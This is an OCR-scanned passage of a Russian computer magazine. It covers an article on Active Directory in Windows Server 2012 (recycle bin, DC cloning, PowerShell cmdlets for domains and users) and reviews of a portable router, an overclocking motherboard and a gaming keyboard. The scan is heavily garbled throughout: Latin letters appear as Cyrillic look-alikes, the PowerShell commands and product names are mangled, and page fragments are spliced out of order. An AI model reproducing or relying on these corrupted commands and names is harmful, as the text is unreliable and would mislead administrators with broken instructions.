инструмент, позволяющий автоматизировать все процессы при по- 
мощи сценариев и обладающий теми же возможностями, что и 6Ш. 

А вот консоли ММС и стсі.ехе на эту роль не подходят, хотя еще 
входят в состав ѴѴіпсІоѵѵз (правда, сильно запрятаны). 

Роль развертывания АО 05 теперь является частью новой архи- 
тектуры Мападег Зегѵег, позволяющей выполнять удаленную уста- 
новку на несколько машин (их нужно просто указать в мастере или 
в команде Р5). Новый мастер сочетает командлеты, заменяющие 
привычные для администраторов утилиты бсргото и абргер — они 
пока доступны, но прибегать к ним рекомендуется только в редких 
случаях. Так, место бсргото занял модуль Р5 АООЗОерІоутепІ, ко- 
торый запускается в мастере после установки роли, автоматически 
или вручную (Рготоіе іЫз зегѵег Іо а ботаіп сопігоііег). Повысить 
сервер до КД можно в любой удобный момент. Расширение схемы, 
подготовка леса и домена теперь происходят автоматически во 
время процесса повышения до контроллера домена и не требуют 
больше выполнения отдельных задач на 5сЬета Мазіег. 

Единственный вариант использования абргер — подготовка до- 
мена и леса при обновлении ѴѴіп2к8Р2 (ключи /ботаіпргер 
и Логезіргер). Хотя опять же — весьма желательна чистая установ- 
ка. Мастеры стали проще. Так, при создании нового контроллера 
домена необходимо пройти всего восемь диалоговых окон (раньше 
двенадцать), продвинутые настройки не скрываются (поэтому про- 
пустить их нельзя), все текущие операции выполняются в одном 
окне. Например, 0М5 и сервер глобального каталога по умолчанию 
устанавливаются для каждого контроллера домена. При создании 
нового леса необходимо выполнить единственный командлет, 
которому в качестве параметра передать имя домена (об этом 
дальше). При создании и повышении КД первоначально произво- 
дятся проверки, снижающие вероятность неудачного завершения 



^■N00^5 5ЕКѴЕК 2012: 
НОВЫЕ ВОЗМОЖНОСТИ 
СЛУЖБ ДОМЕНОВ 
АСТІѴЕ ОІКЕСТОКУ 

Учитывая, что Асііѵе Оігесіогу глубоко инте- 
грирована в ОС, усовершенствования в этой 
службе затрагиваюттакие ключевые области 
среды, как аутентификация, управление досту- 
пом, групповые политики, работа стандартных 
и кластерных сервисов, виртуализация. Боль- 
шая часть нововведений носит эволюционный 
характер: многие известные ранее функции до- 
полнены и существенно переработаны, управ- 
ление значительно упрощено. Давай разбирать- 
ся, с чем придется иметь дело. 



НОВЫЕ ФУНКЦИИ И УПРОЩЕННОЕ УПРАВЛЕНИЕ 



Служба АО развивается уже более 12 лет, и в новом релизе раз- 
работчики использовали весь свой опыт, чтобы пересмотреть 
существующие подходы к управлению, сделать все операции более 
гибкими, а главное — интуитивно понятными. Теперь основой кон- 
фигурирования АО 05, включая процессы развертывания, настрой- 
ки и репликации, является Роѵѵег5ЬеІІ. Сюда же можно отнести дей- 
ствия, выполняемые при помощи графического инструмента «Центр 
администрирования Асііѵе Оігесіогу» (АОАС), который является, 
по сути, фронтендом для Роѵѵег5ЬеІІ. При любых настройках в АОАС 
соответствующие команды будут занесены в историю (выводится 
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Контейнер для гранулированной настройки парольных политик 



операции; если ошибки обнаружатся, их можно устранить до на- 
чала операции. 

В ѴѴіп2к8 появилась возможность назначать несколько политик 
паролей для конкретных пользователей или групп пользователей 
с помощью механизма Ріпе-СгаіпесІ РаззѵѵогсІ Роіісу, но удобного 
инструмента не предлагалось. Спустя некоторое время стали до- 
ступны утилиты третьих фирм, упрощающие задачу, к ним можно 
отнести Ріпе бгаіпесі РаззѵѵогсІ Роіісу ТооІ, Вресорз Раззѵѵогб Роіісу 
Вазіс, Раззѵѵогб Роіісу Мападег и другие. Теперь нужные настройки 
доступны в АОАС, и работать с ними просто: переходим в контейнер 
«Вузіеіті ^ РаззѵѵогсІ Веиіпдз Сопіаіпег», выбираем пункт меню 
«Создать ^ Параметры паролей», заполняем в предложенных полях 
требования к паролю и указываем, к каким объектам их применять. 

В дополнение к возможности Мападеб Вегѵісе Ассоипіз (М5А), 
появившейся в ѴѴіп2к8Р2, но не поддерживаемой в некоторых сце- 
нариях (вроде кластеров), введен новый класс безопасности Сгоир 
Мападеб Вегѵісе Ассоипіз (дМВА), позволяющий выполнять задачу 
под одной учетной записью на нескольких серверах. Для проверки 
пароля используется специальная служба Сгоир Кеу ОізІгіЬиІіоп 
Вегѵісе (СКОВ), работающая также на серверах ѴѴіп2012. По умолча- 
нию пароль дМВА меняется каждые 30 дней. 

Еще одна функция — активация с помощью Асііѵе Оігесіогу 
Вазеб Асііѵаііоп (АОВА) — позволяет активировать компьютеры, 
работающие не в основной сети (например, находятся в удаленном 
филиале), во время присоединения к домену при наличии универ- 
сального ключа многократной установки СѴІК. Ранее для этого 
требовалось физически подключать такие компьютеры к сети 
и разворачивать Кеу Мападетепі Вегѵісе (КМВ) или, как вариант, 
покупать розничный ключ. Для управления АОВА предлагается 
специальный инструмент Ѵоіите Асііѵаііоп Мападетепі Тооікіі 
(ѴАМТ, доо.дІ/ЗЕтѴВ ). который можно скачать отдельно или 
как часть ѴѴіпбоѵѵз Аззеззтепі апб Оеріоутепі К\{ (АОК). 

Кроме этого, в АОАМ изменен интерфейс мониторинга, улучше- 
но отслеживание состояния Сгоир Роіісу, расширены выдаваемые 
рекомендации по обслуживанию и обновлен журнал событий. 

Функция динамического управления доступом (Оупаппіс Ассезз 
Сопігоі) позволяет установить политики, основываясь на роли 
пользователя, используемом устройстве, атрибутах каталогов 
и данных, к которым планируется получить доступ. Параллель- 



Начиная с ѴѴіп2к8Р2, защитить объект АО от случайного удале- 
ния возможно для отдельной учетной записи, компьютера, группы 
или подразделения. Достаточно установить флажок в свойствах, 
и при попытке удалить объект администратор получает предупрежде- 
ние о невозможности произвести требуемую операцию. 



но ВАС позволяет снизить количество групп безопасности, что 
должно упростить администрирование, особенно в сложных сетях. 
Для определения назначения файлов используется средство клас- 
сификации. Доступ, кроме групп, может предоставляться по заяв- 
кам (сіаітз), которые интегрированы в КегЬегоз. Упрощен порядок 
восстановления отказа в доступе (Ассезз Оепіеб Ретебіаііоп). 

Начиная с ѴѴіп2к8Р2, клиентские ПК можно было присоединить 
к домену при помощи специально подготовленного файла, без на- 
личия подключения к доменной сети (так называемое автономное 
присоединение к домену, ОІ^Ліпе Ооппаіп боіп). Это сокращало 
время на развертывание (особенно в случае массового создания 
ѴМ), компьютер становился практически полноценным членом до- 
мена. Тем не менее такой подход имел ряд ограничений, например 
нельзя было сразу настроить и подключить ОігесіАссезз. Теперь 
это возможно, так как в процессе ОІ^Ліпе Ооппаіп боіп передаются 
сертификат и политики. 

Процедуру создания индекса, которая ранее нагружала КД, 
теперь можно отложить до времени простоя сервера. Такие задачи, 
как выдача, контроль и мониторинг относительных идентификато- 
ров РІО (Реіаііѵе ІбепІіЛег), используемых для генерации иденти- 
фикаторов безопасности (510) для пользователей, групп и ком- 
пьютеров, стали более управляемыми. Когда запас РІО подходит 
к концу (10%), система начинает генерировать предупреждения. 
Количество РІО, которое может генерировать домен, удвоено (с 1 
до 2 миллионов, точнее с 2'^30 до 2'^31). 



ВИРТУАЛИЗАЦИЯ КОНТРОЛЛЕРА ДОМЕНА 



В ѴѴіпбоѵѵз до 2012 существовало несколько проблем, мешающих 
запускать контроллер домена в ѴМ: нельзя было восстанавливать 
работу из снапшота, а также клонировать и выполнять Ѵ2Ѵ- 
миграцию. Причина одна, и заключается она в возникновении 
так называемого ІІ5М гоІІЬаск (Іірбаіе Зедиепсе МитЬег, номер 
последнего обновления), когда соседние КД запоминают послед- 
ний ІІ5М партнера и, если он оказывается меньше ожидаемого, 
попросту блокируют обновления с этого КД, считая, что их база ак- 
туальна. Конечно, давно доступны рецепты, позволяющие решить 
эту проблему вручную, но уж слишком много волокиты. В ѴѴіп2012 
используется функция ѴМ-6епегаІіоп Ю, которая обеспечивает 
возможность нормально реплицировать данные КД, запущенного 
в ѴМ. Представляет она собой уникальный 128-битный идентифи- 
катор, который хранится в нереплицируемом атрибуте АО. Перед 
применением изменений в базу АО контроллер домена сравнивает 
значение ѴМ-6епегаІіоп ІО в своей базе АО со значением, полу- 
ченным от гипервизора через драйвер ѴѴіпбоѵѵз Зегѵег 2012. Если 
обнаруживается отличие, то делается вывод о применении отката. 
Теперь администраторы получают возможность восстанавливать 
работу КД из снапшотов и клонировать КД. Соответственно, эти 
возможности уже реализованы в интерфейсе и в командлетах Р5, 
и все операции максимально упрощены. 
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КОРЗИНА АСТІѴЕ ОІРЕСТОРѴ 



Простота управления АО и сложность сетей приводит к росту 
процента ошибок, а удалить любой объект очень легко. И не обяза- 
тельно это должно быть умышленное действие — достаточно не- 
большой опечатки в скрипте. Если вовремя не обнаружить ошибку 
и она реплицируется на остальные КД, то восстановление объекта 
может изрядно потрепать нервы, даже если имеется резервная ко- 
пия. Проблема не нова, и в М5 это отлично понимали. В результате 
утилита МТ051ІТІІ из ѴѴіп2к8, использующая службу Ѵ55, позво- 
ляла восстановить организационное подразделение и отдельный 
объект, правда, с одной оговоркой — в настройках по умолчанию 
при удалении объекттеряет большую часть своих свойств (пароль, 
тападесІВу, теппЬегОІ' и прочие), поэтому после восстановления он 
будет не совсем тем, что требуется. 

В ѴѴіп2к8Р2 появилась корзина АО (Асііѵе Оігесіогу Ресусіе Віп, 
АО РВ), которая автоматически активируется, когда домен находит- 
ся на уровне ѴѴіп2к8Р2. По своей сути она схожа с корзиной, исполь- 
зуемой в ѴѴіпсІоѵѵз, куда помещаются удаленные файлы, и случайно 
удаленный объект может быть быстро и без проблем восстановлен. 
Причем восстановленный из АО РВ объект сразу же получает и все 
свои атрибуты. По умолчанию время «жизни» удаленного объекта 
в АО РВ составляет 180 дней, после этого он переходит в состоя- 
ние Ресусіе Віп ЫІ'еІіппе, теряет атрибуты и через некоторое время 
полностью удаляется. Для восстановления предлагалось использо- 
вать командлеты 6еІ-А00Ь)есІ и Ре5Іоге-А00Ь)есІ: 

Р5> ее1;-АООЬзес1; -Рііііег {сІІБрІауЫате -ед "изег"} <-> 
-Іпс1исІеОе1е1:есІОЬзес1;5 | КезІіоге-АООЬзесІ: 



Для работы корзины необходимо, чтобы лес работал на функци- 
ональном уровне ѴѴіп2к8Р2 (узнать можно, запустив беІ-АОРогезІ 
и просмотрев строку РогезіМосІе). При создании леса и домена 
в ѴѴіп2012 функция АО РВ по умолчанию отключена, активировать 
ее можно из АОАС, выбрав «Задачи ^ Включить корзину», или 
при помощи командлета ЕпаЫе-АООрІіопаІРеаІиге: 

Р5> ЕпаЫе-АООр1;іопа1Реа1:иге -Ісіеп1;і1:у 
'СМ=Кесус1е Віп Реа1:иге^СМ=Ор1:іопа1 
Реа1:иге5^СN=^ігес1:огу 5егѵісе^ СМ=1лІіпсІоы5 NТ^ ^ 

СМ=5егѵісе5.СМ=Сопб^ига1:іоп.РС=асІ.РС=ехатр1е. ^ 

РС=ог^' -Бсоре Роге5І:0гСопб^ига1:іоп5е1: <-■ 

-Таг^еі: 'ехатріе.ог^' 

После чего некоторое время понадобится на репликацию на- 
строек. Теперь все удаленные объекты будут находиться в кон- 
тейнере Оеіеіесі ОЬ)есІ5, просто выбираем нужный, ориентируясь 
по имени или прочим атрибутам. Если родительский объект 
не существует (его можно найти при помощи пункта меню «Найти 
родительский элемент»), предусмотрено восстановление в другую 
ветку при помощи «Восстановить в» (Резіоге То). 

Но нужно помнить, что включение АО РВ — процесс необ- 
ратимый, то есть выключить корзину нельзя (об этом выводится 
предупреждение при активации), и хотя это полезная возмож- 
ность, но в больших меняющихся средах она будет приводить 
к увеличению базы. Эту проблему можно частично решить, напри- 
мер уменьшив время хранения объекта в корзине. Особо следует 
отметить, что АО РВ не отменяет, а дополняет операции резервного 
копирования. 



АДМИНИСТРИРОВАНИЕ АР С Р0ѴѴЕР5НЕЕІ 



Сегодня РоѵѵегЗЬеІІ становится главным инструментом при адми- 
нистрировании ѴѴіпсІоѵѵз, поэтому рассмотрим основные команд- 
леты, касающиеся АО. Так, чтобы добавить роль АО 05, достаточно 
выполнить команду: 

Р5> АсІсІ-1лІіпсІоы5Реа1:иге АР-Ротаіп-5егѵісе5 ^ 

гІпс1исІеМапа§етеп1;ТооІ5 

Если установка выполняется на удаленную машину, просто до- 
бавляем «-СотриІегМате <сотриІег_паппе> -Резіагі». В примере 



ШПАРГАЛКА ПО РАБОТЕ С АО 



Количество параметров командлета позволяет строить сценарии 
любой сложности. Например, найти организационное подразделе- 
ние ОСІ, к которому принадлежала удаленная учетная запись, и за- 
тем восстановить весь ОСІ. В ѴѴіп2012 в дополнение к этому появился 
графический интерфейс для АО РВ, при помощи которого можно 
включить корзину, найти и восстановить удаленные объекты. Учи- 
тывая, что АОАС и АО РВ базируются на РоѵѵегЗЬеІІ, все предыдущие 
сценарии будут работать, переписывать ничего не придется. 



На самом деле объект АО удаляется не сразу: 
вначале он помечается маркером «ЩтЬзЩпе» 
и перемещается в контейнер ОеІе^есІ ОЬ)ес^з, 
после чего запускается счетчик жизни ТотЬ- 
зЩпе Ы^еіііте, по истечении которого объект 
окончательно убирает специальный процесс 
багЬаде СоІІесЩг. В новых версиях значение 
ѴѴіпсІоѵѵз ТотЬзЩпе Ы^е^ііпе равно 180 дням. 



ѴѴАКМІМ6 



Асііѵе Оігес- 
Іогу Ресусіе Віп 
не отменяет, 
а дополняет 
операции по 
резервному 
копированию. 



Добавить компьютер в домен: 

АсІсІ-Сотри1;ег -РотаіпМаше тусіотаіп . Іосаі 
Создать пользователя: 

Меы-А01І5ег -ЗатАссоипіМате ІІзегІ -АссоипіРазБыогсІ <-!_ 
(геасІ-Іі05І; "5е1: изег разБыогсІ" -а55есиге5І;гіп§)_е__ 
-паше "ІІБегІ" -епаЫесІ $1:гие -РаззыогсІМеѵегЕхр ігеБ <-■ 
$1:гие -СІіап§еРа55ыогсІА1:Іо§оп $-РаІ5е 

Включить пользователя в группу: 

АсІсІ-А0Ргіпсіра1СгоирМетЬег5Ііір -Ісіеп1;і1;у_е 

"СN=^5ег1^СN=^5ег5^^С=тусIотаіп^^С=1оса1" 

-МетЬегО-Р "СМ=Еп1;егргІ5е Асітіпз . СN =^5е^5 . <-■ 

^С=тусIотаіп^^С=1оса1"^"СN=^отаіп АсігпіпБд. 

СМ=ІІ5ег5^0С=тусІотаіп^0С=1оса1" 






Ж'' 
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По умолчанию корзина Асііѵе Оігесіогу отключена. Включив, отключить ее нельзя 




вместе с АО установили и инструменты управления, в том числе мо- 
дуль Р5, который затем следует подключить, чтобы он был виден: 

Р5> Ішрогіі-Мосіиіе Ас1:іѵеОігес1;огу 

Далее создаем КД, домен или лес. Для этого предлагается три 
командлета: ІпзІаІІ-АООЗОотаіпСопІгоІІег, ІпзІаІІ-АООЗОотаіп 
и ІпзІаІІ-АООЗРогезІ. Их работа в общем схожа, если не указать 
дополнительные параметры в командной строке, они будут запро- 
шены по ходу выполнения скрипта: 

Р5> Іп5І:а11-АРР5РопіаіпСоп1:го11ег "ехатріе.ог^" 

Иногда лучше произвести предварительные проверки при по- 
мощи командлета ТезІ-АООЗОотаіпСопІгоІІегІпзІаІІаІіоп: в отличие 
от параметра -ѴѴЬаШ', он проверит, возможны ли соответствующие 
изменения в текущих условиях. 

При создании леса можно сразу указать его уровень: 

Р5> ІпзІіаІІ-АООЗРогезІ; -ОотаіпМате ехатр1е.ог§ 4-' 
-Сгеа1:е^N5^е1е§а1;іоп -ОошаіпМосІе ІлІіпВ 

-РогезІіМосІе ІлІіпВ 



Получим список всех КД: 



При этом возвращаются подробные сведения. Параметр РіКег, 
используемый в командлетах АО РоѵѵегЗЬеІІ, ограничивает список 
возвращаемых объектов. 

Просмотрим данные об объектах репликации: 

Р5> 6е1:-АРКер1іса1:іоп5і1:е -Рііііег * 

Домен создан, пора его наполнить учетными записями. Для этих 
целей предлагается командлет Меѵѵ-АООзег. В самом простом 
случае достаточно указать его имя, и пользователь будет автома- 
тически помещен в группу «Пользователи домена» (ІІзегз), поэтому 
лучше сразу задать группу: 

Р5> Ыеы^АОизег ^пате ІІзегІ -ра1;Іі ^ 

"5М=5а1ез^0С=ехатр1е^0С=ог§" -раззТбги 

Используя остальные параметры (подробнее доо.дІ/дЫгЬ или 
«беІ-НеІр Меѵѵ-АсШзег-^иІІ»), можно заполнить любые атрибуты 
учетной записи. Если количество пользователей велико, то проще 
выполнить импорт из заранее подготовленного С5Ѵ-файла (при 
помощи ІтрогІ-С5Ѵ). 

Проверить установки любой учетной записи или отобрать их 
по фильтру можно при помощи командлета беІ-АОІІзег. После соз- 
дания учетная запись выключена, не забываем ее включить: 



Р5> (зе1:-АРРопіаіпСоп1:го11ег -Рііііег * ^ 
I -Р1: Ноз1;пате^5і1;е 




Смотрим параметры контроллера домена и компьютера средствами РоѵѵегЗЬеІІ 



Р5> ЕпаЫе-АРАссоипІ: ІІзегІ 



Практически для всех остальных операций по созданию объ- 
ектов АО также предложены свои командлеты — компьютеры 
(Меѵѵ-АОСотриІег), организационное подразделение 00 (Меѵѵ- 
А00гдапІ2аІіопаІІІпіі), группы (Меѵѵ-АОбгоир) и так далее. Форматы 
вызова во многом напоминают Меѵѵ-АООзег. Соответственно, все 
командлеты для получения специфических данных начинаются 
с 6еІ-А0*, для изменения предназначены 5еІ-А0*. Автодополнение 
доступно по клавише табуляции, поэтому найти нужные легко. На- 
пример, чтобы получить список всех групп, куда входит пользова- 
тель, набираем: 

Р5> СеІі-АОизег -Ісіеп1;і1;у ІІзегІ -Ргорегіііез МешЬегО-Р ^ 



Чтобы контроллер домена можно было 
клонировать, его нужно добавить в группу 
СІопеаЫе Оотаіп Соп^гоІІегз. Сделать это можно 
с помощью консоли Асііѵе ОігесЩгу ІІзегз апсі 
Соппри^егз, панели управления Ас^іѵе ОігесЩгу 
Асіппіпіз^га^іѵе СепЩг или же команды Ро\л/ег5ИеІІ. 



УШИ 

• Описание Асііѵе 
Оігесіогу-Вазесі 
Асііѵаііоп: 
доо.дІ/кѵрѵѵБ; 

• скачать ѴАМТ: 
аоо.аІ/ЗЕтѴВ: 

• подробнее о 
параметрах Меѵѵ- 
АОІІзег: доо.дІ/дЫіЬ . 
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РЕКким 



Даниил Либарц 




я ВСЕГДА 

С СОБОЙ 
БЕРУ 

ТЕСТИРОВАНИЕ БЕСПРОВОДНОЙ ТОЧКИ 
ДОСТУПА ТРЕМОМЕТ ТЕѴѴ-655ВР36 




Интерфейсы: 1 х ѴѴАМ/ІАМ (Р^-45) 
10/100 Мбит/с 

Беспроводной интерфейс: ѴѴі-Рі, 

1ЕЕЕ802.11Ь/д/п 

Частотный диапазон: 2,4 ГГц 

Безопасность: ѴѴЕР, ѴѴРА/ѴѴРА- 

Р5К,ѴѴРА2/ѴѴРА2-Р5К(ТКІР, 

АЕ5І,ѴѴР5 

Функции роутера: МАТ, ОупОМЗ, 
Зіаііс Роиііпд, ОНСР, Ѵігіиаі Зегѵег, 
РогіТгіддегіпд, 0о5 
Поддержка соединений: Зіаііс ІР, 
ОупатісІР,РРТР,12ТР 
Дополнительно: ІІ5В-порт, 
аккумулятор 
Питание: сетевой БП 




Производительность МАТ 

УР: 56 Мб/с 

ООѴѴМ:65Мб/с 

РОХ:70Мб/с 

Производительность ѴѴІ-РІ, 1/6 м 

УР: 60/56 Мбит/с 
ООѴѴМ: 67/60 Мбит/с 
РОХ: 70/62 Мбит/с 

Сервер 

Процессор: Іпіеі Сеіегоп ОиаІ-Соге 
0530 

Системная плата: Н67М5-Е23 
Оперативная память: 2 х 2 Гб, 

Кіпдзіоп, ООРЗ 

Блок питания: 400 Вт, Г5Р 
Операционная система: МісгозоН 
ѴѴіпсіоѵѵБ Зегѵег 2008 Р2 БіапсІагсІ 
х64 

Клиент 

Ноутбук: ТозЫЬа 5АТЕШТЕ 
1635-120 

Адаптер: В-Ыпк ОѴѴА-160 



Обстоятельства обязывают нас постоянно быть на свя- 
зи. Проверка рабочей почты, дружеская переписка 
в РасеЬоок, проверка погоды, новостей, пробок — этот 
список можно продолжать еще долго. И ладно, если 
речь идет о смартфоне. А если в одном месте собраны 
ноутбуки, планшеты и телефоны? На даче, например, 
или «на югах». Что же, это не проблема для героя на- 
шего тестирования — портативной точки доступа с воз- 
можностью выхода в интернет через мобильную сеть 
ТРЕМОпеаЕѴѴ-655ВР30. 

На первый взгляд кажется, что роутер изготов- 
лен из цельного куска металла и обладает немалой 
массой. Наши опасения были напрасными, ТРЕМОпеІ 
ТЕѴѴ-655ВР36 оказался достаточно легким даже 
с установленным аккумулятором. Разъем для пита- 
ния, ЕЧпегпеІ и тумблер включения находятся сзади 
на торце. Сразу обращаешь внимание на уникальный 
разъем «кормушки». Это не очень удобно, ведь при- 
дется всегда таскать с собой адаптер питания, вместо 
того чтобы зарядить роутер от пары СІ5В. На правой 
стороне можно увидеть порт СІ5В, утопленную кнопку 
сброса, а также клавишу ѴѴР5. Комплектация стан- 
дартна. На наш взгляд, неплохо было бы добавить 
чехол для переноски устройства. 

После включения роутер заморгал зелеными 
светодиодами, сообщая об активности всех ин- 
терфейсов. Включение и перезагрузка происходят 
недолго, но закрытие окон занимает немало времени. 
Меню выполнено в непривычном, но удобном стиле. 

В верхнем фрейме находятся основные пункты меню, 
при нажатии на которые слева появляются под- 
пункты. Обилие настроек радует глаз, хотя поиск 
некоторых функций (с непривычки) может занять 
немало времени. ТРЕМОпеІ ТЕѴѴ-655ВР36 не обладает 
фиксированными режимами, поэтому для каждого 
случая его необходимо настраивать индивидуально, 
в соответствии с требованиями. 



Девайс оказался стабильным и дружелюбным. 
Радуют и скоростные показатели. Единственное, что 
портит картину, — это немалый нагрев. Во время про- 
должительной нагрузки от нескольких клиентов роутер 
сильно греется, несмотря на отверстия для отвода 
горячего воздуха, так что мы рекомендуем обеспечить 
дополнительную вентиляцию девайса. 

МЕТОДИКАТЕСТИРОВАНИЯ 

Для данного типа устройств важны не столько скорост- 
ные показатели, сколько надежность, универсальность 
и мобильность. Например, если тестировать роутеры 
на скорость подключения к мобильной сети, то мы 
получим характеристику самого оператора, а не на- 
шей «железки». Физически проверять на совмести- 
мость с каждым из существующих модемов на каждом 
операторе почти нереально. Ведь ежедневно выходят 
новые прошивки и новые модемы. Как показывает 
практика, если модем указан в списке поддерживаемых 
устройств, то с высокой вероятностью он будет работать 
без глюков. В большинстве случаев роутер не нуждает- 
ся даже в настройке. Он сам подхватывает необходимые 
данные о модеме и операторе и выходит в интернет. 

Важным моментом является производительность ра- 
боты ѴѴІ-РІ (на отдалении одного и шести метров), а также 
скорости трансляции сетевых адресов МАТ. Для теста мы 
будем использовать нашу стандартную методику с по- 
мощью комплекса от компании Іхіа. Как обычно, для каж- 
дого из тестов трафик пропускался в прямом и обратном 
направлениях, а также одновременно в обоих. 

ВЫВОД 

За исключением пары недочетов, у ТРЕМОпеІ получи- 
лась отличная мобильная точка доступа. На наш взгляд, 
ТЕѴѴ-655ВР36 подойдет больше для «дачного» и/или 
«автомобильного» варианта, нежели для путешествий 
своим ходом. ^ 
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Сергей Плотников 




СІСАВУТЕ 

6А-277Х- 



Р0Р0ѴЕРСЮСКЕР2. 
ВУ 0ѴЕРСШСКЕР5 



Материнская плата 6І6АВУТЕ 6А-277Х-УР7 — не пер- 
вый оверклокерский концепт от известнейшей тай- 
ваньской компании. Совместно с мировой легендой 
оверклокинга — Нісоокіе — уже была разработана 
одна ОС-плата — 6А-Х58А-0С. И она получилась 
сверхудачной! А потому мы не удивлены, что сотруд- 
ничество одного из лидеров в производстве матплат 
и одного из лидеров мирового оверклокинга было 
продолжено. 









М 



Сокет: 16А1155 

Чипсет: 111 Ехргезз 

Память: 4 х 01ММ, ООРЗ-1066-2400 

Слоты расширения: 5 х РСІ Ехргезз 

ХІ6, 2 X РСІ Ехргеззхі 

Дисковые контроллеры: 4 х 5АТА II, 

6 X 5АТА 3.0, 1 X тЗАТА 

Сеть: 1 X МНегоз 0ЬЕ САМ, 10/100/1000 

Мбит/с; 1 X Іпіеі 0ЬЕ САМ, 10/100/1000 

Мбит/с; 1ЕЕЕ802.11а/Ь/д/п, ВІиеЮоіН 

Ѵ4.0 

Аудио: 7.1СН, НОА на основе РеаІІек 
АЕС898 

Разъемы на задней панели: 6 х С15В 
3.0, 1 хО-5иЬ, 1 хОѴІ, 1 хНОМІ, 

1 X ОізрІауРогС 1 X 5/РОІР, 2 х РЗ-45, 

1 X Р5/2, 6 X 3,5-мм ]аск 

Форм-фактор: Е-АТХ 



Процессор: Іпіеі Соге І5-2500К, 3300 
МГц 

Материнская плата: 6І6АВУТЕ СА- 
277Х-УР7 

Оперативная память: Кіпдзіоп КНХ- 
26С11Т2К28Х (62133 МГц, 2 х 4 Гб/с 
Видеокарта: АМО Рабеоп НО 7870 
Жесткий диск: ѴѴезІегп ОідКаІ 
ѴѴО10Е2ЕХ, 1 Тб 

Блок питания: ЕМЕРМАХ ЕРМ750АѴѴТ, 
750 Вт 

ОС: ѴѴіпсІоѵѵБ 7 Максимальная, 
64-разрядная 




БирегРІ 1.5X5, 1т: 11,310/7,564 с 
ѵѵРгіте 1.55, 32т: 9,345/5,996 с 
ѴѴіпРАК: 3752/4482 Кб/с 

СІМЕВЕМСН Р11.5: 4,81/7,1 р(з 



О ТОМ, что СІСАВУТЕ СА-277Х-ІІР7 «заточена» под нужды 
оверклокинга, говорит абсолютно все. Нет, даже не го- 
ворит, кричит об этом! Начиная от разводки компонен- 
тов и заканчивая всевозможными приятными бонусами. 
Так, на текстолите «мамы» распаяно сразу пять портов 
РСІ Ехргезз ХІ6. Причем четыре оранжевого цвета 
и еще один — черного. Суть такого разделения кроется 
в поддержке 5Ы- и СгоззРігеХ-массивов. При использо- 
вании всех четырех видеокарт «цветастые» порты будут 
работать по схеме х8 + х8 + х8 + х8. Черный же РСІ-Е-слот 
предназначен для бенчинга одиночного адаптера. Он 
напрямую связан с СРСІ (без РЕХ-микросхем), следова- 
тельно, любые задержки сведены к минимуму. Распаяны 
на плате и пара портов РСІ Ехргезз х1. При этом в ком- 
плекте идет РСІ-Е-карта с поддержкой беспроводной 
сети ІЕЕЕ 802.11а/Ь/д/п и ВІиеІооіЬ Ѵ4.0. 

Лирическое отступление: отметим и большое число 
САТА-портов. Так, плата насчитывает сразу шесть кон- 
некторов 5АТА3.0 с пропускной способностью 600 Мб/с 
и четыре — 5АТА II. Есть на плате и порт пгіВАТА, для ис- 
пользования технологии 550-кеширования. 

Второе, что сразу же привлекает внимание 
у СІСАВУТЕ СА-277Х-СІР7, — наличие огромнейшего 
блока фаз питания. Так, для нужд центрального про- 
цессора используется 32 (!) фазы. Еще две отряжены 
для стабилизации питания ѴТТ-модуля, и еще три — 
для встроенной графики процессоров Іпіеі. Зачем столь- 
ко? Все просто: на плате распаяно сразу два 8-пиновых 
коннектора для питания СРІІ. И в моменты экстремаль- 
ного разгона под жидким азотом «камень» перманентно 
может потреблять до 500 Вт энергии. В свою очередь, 

32 фазы совместно с тремя цифровыми стабилизато- 
рами распределяют эту энергию, облегчая процессору 
жизнь. Отметим и наличие более надежных и холодных 
мосфетов. В СІСАВУТЕ СА-277Х-ІІР7 используются регу- 



ляторы напряжения ІР3550 РоѵѵІРзІадез производства 
компании Іпіегпаііопаі РесІіЯег. Все элементы питания 
объединены в технологию ОКга ОигаЫе 5. 

Идем дальше. Для облегчения процесса разгона 
процессора на текстолите имеются две секции. Та, что 
ближе к 5АТА-портам, оснащена индикатором Р05Т- 
кодов, кнопкой перезагрузки системы и рычагами ВІ05 
5е1ес1ог. Та, что ближе к слотам ОІММ, оснащена целым 
рядом клавиш для изменения множителя процессора, 
частоты тактового генератора (с шагом от 0,1 до 1 МГц), 
кнопками включения/выключения стенда и сброса 
настроек ВІ05, а также разъемами для подключения 
клемм мультиметра. 

Естественно, как никогда щедр на оверклокерские 
настройки и ВІ05. В нем есть все, что нужно для успеш- 
ного разгона процессора и памяти. А потому мы 
без особых проблем смогли разогнать «на воздухе» наш 
тестовый Іпіеі Соге І5-2500К до стабильных 5000 МГц! 

В свою очередь, на сайте ИѵѵЬоЕогд зарегистрирован ряд 
интереснейших результатов (сІск.ги/ЗгобМ ). Например, 
оверклокер Теат.Аи сумел «раскочегарить» уже Іѵу 
Вгісіде І7-3770К до 7010,04 МГц. И сразу же попал в де- 
сятку лучших рекордов мира по разгону этого «камня»! 

ВЫВОД 

в общем, тенденции производства материнских платта- 
ковы, что если то или иное устройство отлично показы- 
вает себя в оверклокинге, следовательно, оно отлично 
покажет себя не только в качестве основы для бенч- 
стенда. Поэтому СІСАВУТЕ СА-277Х-ІІР7 великолепно 
проявит себя в роли связующего звена для очень 
мощного игрового системного блока или же в роли 
основы для производительной рабочей станции. Глав- 
ное, не забудь приобрести корпус с поддержкой Е-АТХ 
материнских плат. ^ 
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РЕКким 



Екатерина Михеева-Капанжа 



ИГРОВОЙ 

ТАНДЕМ! 




ЮбІТЕСН 6103 6АМІМ6 КЕУВОАРО 

ІодіІесЬ 0103 Заппіпд КеуЬоагсІ предусматривает два режима: рабочий и игровой, во время 
второго отключаются клавиши ѴѴіпсІоѵѵз и контекстного меню. Для перехода в игровой ре- 
жим на клавиатуре есть специальная кнопка, а для его индикации — светодиод. Настро- 
ить оба режима можно в специальном ПО, доступном на сайте производителя. 

С левой стороны расположены шесть программируемых 0-клавиш. При нажатии каж- 
дая из них активируеттакже настроенные ранее в дополнительном ПО функции и комби- 
нации макросов. Кстати, и 0-клавиши, и кнопка переключения режимов, и клавиши ѴѴА50, 
и стрелки выделены красным цветом, сама же клавиатура черная. 

С обратной стороны клавиатуры расположены желобки, в которые можно убрать ка- 
бель, если он будет мешать (длина его 2 метра). Клавиатура достаточно компактна, а воз- 
можность отсоединять подставку для рук пригодится, если игровое пространство совсем 
ограниченно и требует экономии места. Поддержка нажатия до пяти клавиш одновремен- 
но позволяет выполнять сложные маневры без сбоев. Приятно отметить, что ход клавиш 
практически бесшумный. 



Ю6ІТЕСН 6100 6АМІМ6 МОиЗЕ 



